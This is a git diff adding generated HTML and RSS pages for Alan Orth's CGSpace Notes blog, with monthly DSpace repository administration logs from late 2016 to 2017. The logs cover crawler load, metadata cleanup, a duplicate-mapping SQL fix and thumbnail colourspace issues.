+<li>We might actually have to <em>block</em> these requests with HTTP 403 depending on the user agent</li>
+<li>Abenet pointed out that the CGIAR Library Historical Archive collection I sent July 20th only had ~100 entries, instead of 2415</li>
+<li>This was due to newline characters in the <code>dc.description.abstract</code> column, which caused OpenRefine to choke when exporting the CSV</li>
+<li>I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using <code>g/^$/d</code></li>
+<li>Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-07/">July, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-07-01T18:03:52+03:00">Sat Jul 01, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-07-01">2017-07-01</h2>
+<ul>
+<li>Run system updates and reboot DSpace Test</li>
+</ul>
+<h2 id="2017-07-04">2017-07-04</h2>
+<ul>
+<li>Merge changes for WLE Phase II theme rename (<a href="https://github.com/ilri/DSpace/pull/329">#329</a>)</li>
+<li>Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace</li>
+<li>We can use PostgreSQL&rsquo;s extended output format (<code>-x</code>) plus <code>sed</code> to format the output into quasi XML:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-06/">June, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-06-01T10:14:52+03:00">Thu Jun 01, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg.
+  <a href='https://alanorth.github.io/cgspace-notes/2017-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-05/">May, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-05-01T16:21:52+02:00">Mon May 01, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace.
+  <a href='https://alanorth.github.io/cgspace-notes/2017-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-04/">April, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-04-02T17:08:52+02:00">Sun Apr 02, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-04-02">2017-04-02</h2>
+<ul>
+<li>Merge one change to CCAFS flagships that I had forgotten to remove last month (&ldquo;MANAGING CLIMATE RISK&rdquo;): <a href="https://github.com/ilri/DSpace/pull/317">https://github.com/ilri/DSpace/pull/317</a></li>
+<li>Quick proof-of-concept hack to add <code>dc.rights</code> to the input form, including some inline instructions/hints:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/04/dc-rights.png" alt="dc.rights in the submission form"></p>
+<ul>
+<li>Remove redundant/duplicate text in the DSpace submission license</li>
+<li>Testing the CMYK patch on a collection with 650 items:</li>
+</ul>
+<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-03/">March, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-03-01T17:08:52+02:00">Wed Mar 01, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-03-01">2017-03-01</h2>
+<ul>
+<li>Run the 279 CIAT author corrections on CGSpace</li>
+</ul>
+<h2 id="2017-03-02">2017-03-02</h2>
+<ul>
+<li>Skype with Michael and Peter, discussing moving the CGIAR Library to CGSpace</li>
+<li>CGIAR people possibly open to moving content, redirecting library.cgiar.org to CGSpace and letting CGSpace resolve their handles</li>
+<li>They might come in at the top level in one &ldquo;CGIAR System&rdquo; community, or with several communities</li>
+<li>I need to spend a bit of time looking at the multiple handle support in DSpace and see if new content can be minted in both handles, or just one?</li>
+<li>Need to send Peter and Michael some notes about this in a few days</li>
+<li>Also, need to consider talking to Atmire about hiring them to bring ORCiD metadata to REST / OAI</li>
+<li>Filed an issue on DSpace issue tracker for the <code>filter-media</code> bug that causes it to process JPGs even when limiting to the PDF thumbnail plugin: <a href="https://jira.duraspace.org/browse/DS-3516">DS-3516</a></li>
+<li>Discovered that the ImageMagic <code>filter-media</code> plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK</li>
+<li>Interestingly, it seems DSpace 4.x&rsquo;s thumbnails were sRGB, but forcing regeneration using DSpace 5.x&rsquo;s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see <a href="https://cgspace.cgiar.org/handle/10568/51999">10568/51999</a>):</li>
+</ul>
+<pre tabindex="0"><code>$ identify ~/Desktop/alc_contrastes_desafios.jpg
+/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-02/">February, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-02-07T07:04:52-08:00">Tue Feb 07, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-02-07">2017-02-07</h2>
+<ul>
+<li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;;
+  id   | collection_id | item_id
+-------+---------------+---------
+ 92551 |           313 |   80278
+ 92550 |           313 |   80278
+ 90774 |          1051 |   80278
+(3 rows)
+dspace=# delete from collection2item where id = 92551 and item_id = 80278;
+DELETE 1
+</code></pre><ul>
+<li>Create issue on GitHub to track the addition of CCAFS Phase II project tags (<a href="https://github.com/ilri/DSpace/issues/301">#301</a>)</li>
+<li>Looks like we&rsquo;ll be using <code>cg.identifier.ccafsprojectpii</code> as the field name</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-01/">January, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-01-02T10:43:00+03:00">Mon Jan 02, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-01-02">2017-01-02</h2>
+<ul>
+<li>I checked to see if the Solr sharding task that is supposed to run on January 1st had run and saw there was an error</li>
+<li>I tested on DSpace Test as well and it doesn&rsquo;t work there either</li>
+<li>I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&rsquo;m not sure if we&rsquo;ve ever had the sharding task run successfully over all these years</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-12/">December, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-12-02T10:43:00+03:00">Fri Dec 02, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-12-02">2016-12-02</h2>
+<ul>
+<li>CGSpace was down for five hours in the morning while I was sleeping</li>
+<li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li>
+</ul>
+<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+</code></pre><ul>
+<li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li>
+<li>I&rsquo;ve raised a ticket with Atmire to ask</li>
+<li>Another worrying error from dspace.log is:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  
+  
+  <a class="btn btn-outline-primary disabled" href="#" role="button" aria-disabled="true">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/tags/notes/page/2/" rel="next" role="button">Next page</a>
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/tags/notes/index.xml b/docs/tags/notes/index.xml
new file mode 100644
index 000000000..7fcff9dae
--- /dev/null
+++ b/docs/tags/notes/index.xml
@@ -0,0 +1,428 @@
+<?xml version="1.0" encoding="utf-8" standalone="yes"?>
+<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
+  <channel>
+    <title>Notes on CGSpace Notes</title>
+    <link>https://alanorth.github.io/cgspace-notes/tags/notes/</link>
+    <description>Recent content in Notes on CGSpace Notes</description>
+    <generator>Hugo -- gohugo.io</generator>
+    <language>en-us</language>
+    <lastBuildDate>Thu, 07 Sep 2017 16:54:52 +0700</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/tags/notes/index.xml" rel="self" type="application/rss+xml" />
+    <item>
+      <title>September, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-09/</link>
+      <pubDate>Thu, 07 Sep 2017 16:54:52 +0700</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-09/</guid>
+      <description>&lt;h2 id=&#34;2017-09-06&#34;&gt;2017-09-06&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two hours&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2017-09-07&#34;&gt;2017-09-07&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Ask Sisay to clean up the WLE approvers a bit, as Marianne&amp;rsquo;s user account is both in the approvers step as well as the group&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-08/</link>
+      <pubDate>Tue, 01 Aug 2017 11:51:52 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-08/</guid>
+      <description>&lt;h2 id=&#34;2017-08-01&#34;&gt;2017-08-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode sent an alert that CGSpace (linode18) was using 350% CPU for the past two hours&lt;/li&gt;
+&lt;li&gt;I looked in the Activity pane of the Admin Control Panel and it seems that Google, Baidu, Yahoo, and Bing are all crawling with massive numbers of bots concurrently (~100 total, mostly Baidu and Google)&lt;/li&gt;
+&lt;li&gt;The good thing is that, according to &lt;code&gt;dspace.log.2017-08-01&lt;/code&gt;, they are all using the same Tomcat session&lt;/li&gt;
+&lt;li&gt;This means our Tomcat Crawler Session Valve is working&lt;/li&gt;
+&lt;li&gt;But many of the bots are browsing dynamic URLs like:
+&lt;ul&gt;
+&lt;li&gt;/handle/10568/3353/discover&lt;/li&gt;
+&lt;li&gt;/handle/10568/16510/browse&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;The &lt;code&gt;robots.txt&lt;/code&gt; only blocks the top-level &lt;code&gt;/discover&lt;/code&gt; and &lt;code&gt;/browse&lt;/code&gt; URLs&amp;hellip; we will need to find a way to forbid them from accessing these!&lt;/li&gt;
+&lt;li&gt;Relevant issue from DSpace Jira (semi resolved in DSpace 6.0): &lt;a href=&#34;https://jira.duraspace.org/browse/DS-2962&#34;&gt;https://jira.duraspace.org/browse/DS-2962&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;It turns out that we&amp;rsquo;re already adding the &lt;code&gt;X-Robots-Tag &amp;quot;none&amp;quot;&lt;/code&gt; HTTP header, but this only forbids the search engine from &lt;em&gt;indexing&lt;/em&gt; the page, not crawling it!&lt;/li&gt;
+&lt;li&gt;Also, the bot has to successfully browse the page first so it can receive the HTTP header&amp;hellip;&lt;/li&gt;
+&lt;li&gt;We might actually have to &lt;em&gt;block&lt;/em&gt; these requests with HTTP 403 depending on the user agent&lt;/li&gt;
+&lt;li&gt;Abenet pointed out that the CGIAR Library Historical Archive collection I sent July 20th only had ~100 entries, instead of 2415&lt;/li&gt;
+&lt;li&gt;This was due to newline characters in the &lt;code&gt;dc.description.abstract&lt;/code&gt; column, which caused OpenRefine to choke when exporting the CSV&lt;/li&gt;
+&lt;li&gt;I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using &lt;code&gt;g/^$/d&lt;/code&gt;&lt;/li&gt;
+&lt;li&gt;Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-07/</link>
+      <pubDate>Sat, 01 Jul 2017 18:03:52 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-07/</guid>
+      <description>&lt;h2 id=&#34;2017-07-01&#34;&gt;2017-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Run system updates and reboot DSpace Test&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2017-07-04&#34;&gt;2017-07-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Merge changes for WLE Phase II theme rename (&lt;a href=&#34;https://github.com/ilri/DSpace/pull/329&#34;&gt;#329&lt;/a&gt;)&lt;/li&gt;
+&lt;li&gt;Looking at extracting the metadata registries from ICARDA&amp;rsquo;s MEL DSpace database so we can compare fields with CGSpace&lt;/li&gt;
+&lt;li&gt;We can use PostgreSQL&amp;rsquo;s extended output format (&lt;code&gt;-x&lt;/code&gt;) plus &lt;code&gt;sed&lt;/code&gt; to format the output into quasi XML:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-06/</link>
+      <pubDate>Thu, 01 Jun 2017 10:14:52 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-06/</guid>
+      <description>2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&amp;rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &amp;ldquo;Research Themes&amp;rdquo; community will be renamed to &amp;ldquo;WLE Phase I Research Themes&amp;rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg.</description>
+    </item>
+    
+    <item>
+      <title>May, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-05/</link>
+      <pubDate>Mon, 01 May 2017 16:21:52 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-05/</guid>
+      <description>2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&amp;rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&amp;rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace.</description>
+    </item>
+    
+    <item>
+      <title>April, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-04/</link>
+      <pubDate>Sun, 02 Apr 2017 17:08:52 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-04/</guid>
+      <description>&lt;h2 id=&#34;2017-04-02&#34;&gt;2017-04-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Merge one change to CCAFS flagships that I had forgotten to remove last month (&amp;ldquo;MANAGING CLIMATE RISK&amp;rdquo;): &lt;a href=&#34;https://github.com/ilri/DSpace/pull/317&#34;&gt;https://github.com/ilri/DSpace/pull/317&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;Quick proof-of-concept hack to add &lt;code&gt;dc.rights&lt;/code&gt; to the input form, including some inline instructions/hints:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&lt;img src=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2017/04/dc-rights.png&#34; alt=&#34;dc.rights in the submission form&#34;&gt;&lt;/p&gt;
+&lt;ul&gt;
+&lt;li&gt;Remove redundant/duplicate text in the DSpace submission license&lt;/li&gt;
+&lt;li&gt;Testing the CMYK patch on a collection with 650 items:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &amp;#34;ImageMagick PDF Thumbnail&amp;#34; -v &amp;gt;&amp;amp; /tmp/filter-media-cmyk.txt
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-03/</link>
+      <pubDate>Wed, 01 Mar 2017 17:08:52 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-03/</guid>
+      <description>&lt;h2 id=&#34;2017-03-01&#34;&gt;2017-03-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Run the 279 CIAT author corrections on CGSpace&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2017-03-02&#34;&gt;2017-03-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Skype with Michael and Peter, discussing moving the CGIAR Library to CGSpace&lt;/li&gt;
+&lt;li&gt;CGIAR people possibly open to moving content, redirecting library.cgiar.org to CGSpace and letting CGSpace resolve their handles&lt;/li&gt;
+&lt;li&gt;They might come in at the top level in one &amp;ldquo;CGIAR System&amp;rdquo; community, or with several communities&lt;/li&gt;
+&lt;li&gt;I need to spend a bit of time looking at the multiple handle support in DSpace and see if new content can be minted in both handles, or just one?&lt;/li&gt;
+&lt;li&gt;Need to send Peter and Michael some notes about this in a few days&lt;/li&gt;
+&lt;li&gt;Also, need to consider talking to Atmire about hiring them to bring ORCiD metadata to REST / OAI&lt;/li&gt;
+&lt;li&gt;Filed an issue on DSpace issue tracker for the &lt;code&gt;filter-media&lt;/code&gt; bug that causes it to process JPGs even when limiting to the PDF thumbnail plugin: &lt;a href=&#34;https://jira.duraspace.org/browse/DS-3516&#34;&gt;DS-3516&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;Discovered that the ImageMagic &lt;code&gt;filter-media&lt;/code&gt; plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK&lt;/li&gt;
+&lt;li&gt;Interestingly, it seems DSpace 4.x&amp;rsquo;s thumbnails were sRGB, but forcing regeneration using DSpace 5.x&amp;rsquo;s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see &lt;a href=&#34;https://cgspace.cgiar.org/handle/10568/51999&#34;&gt;10568/51999&lt;/a&gt;):&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ identify ~/Desktop/alc_contrastes_desafios.jpg
+/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-02/</link>
+      <pubDate>Tue, 07 Feb 2017 07:04:52 -0800</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-02/</guid>
+      <description>&lt;h2 id=&#34;2017-02-07&#34;&gt;2017-02-07&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;An item was mapped twice erroneously again, so I had to remove one of the mappings manually:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# select * from collection2item where item_id = &amp;#39;80278&amp;#39;;
+  id   | collection_id | item_id
+-------+---------------+---------
+ 92551 |           313 |   80278
+ 92550 |           313 |   80278
+ 90774 |          1051 |   80278
+(3 rows)
+dspace=# delete from collection2item where id = 92551 and item_id = 80278;
+DELETE 1
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;Create issue on GitHub to track the addition of CCAFS Phase II project tags (&lt;a href=&#34;https://github.com/ilri/DSpace/issues/301&#34;&gt;#301&lt;/a&gt;)&lt;/li&gt;
+&lt;li&gt;Looks like we&amp;rsquo;ll be using &lt;code&gt;cg.identifier.ccafsprojectpii&lt;/code&gt; as the field name&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-01/</link>
+      <pubDate>Mon, 02 Jan 2017 10:43:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-01/</guid>
+      <description>&lt;h2 id=&#34;2017-01-02&#34;&gt;2017-01-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I checked to see if the Solr sharding task that is supposed to run on January 1st had run and saw there was an error&lt;/li&gt;
+&lt;li&gt;I tested on DSpace Test as well and it doesn&amp;rsquo;t work there either&lt;/li&gt;
+&lt;li&gt;I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&amp;rsquo;m not sure if we&amp;rsquo;ve ever had the sharding task run successfully over all these years&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-12/</link>
+      <pubDate>Fri, 02 Dec 2016 10:43:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-12/</guid>
+      <description>&lt;h2 id=&#34;2016-12-02&#34;&gt;2016-12-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;CGSpace was down for five hours in the morning while I was sleeping&lt;/li&gt;
+&lt;li&gt;While looking in the logs for errors, I see tons of warnings about Atmire MQM:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&amp;#34;dc.title&amp;#34;, transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&amp;#34;THUMBNAIL&amp;#34;, transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
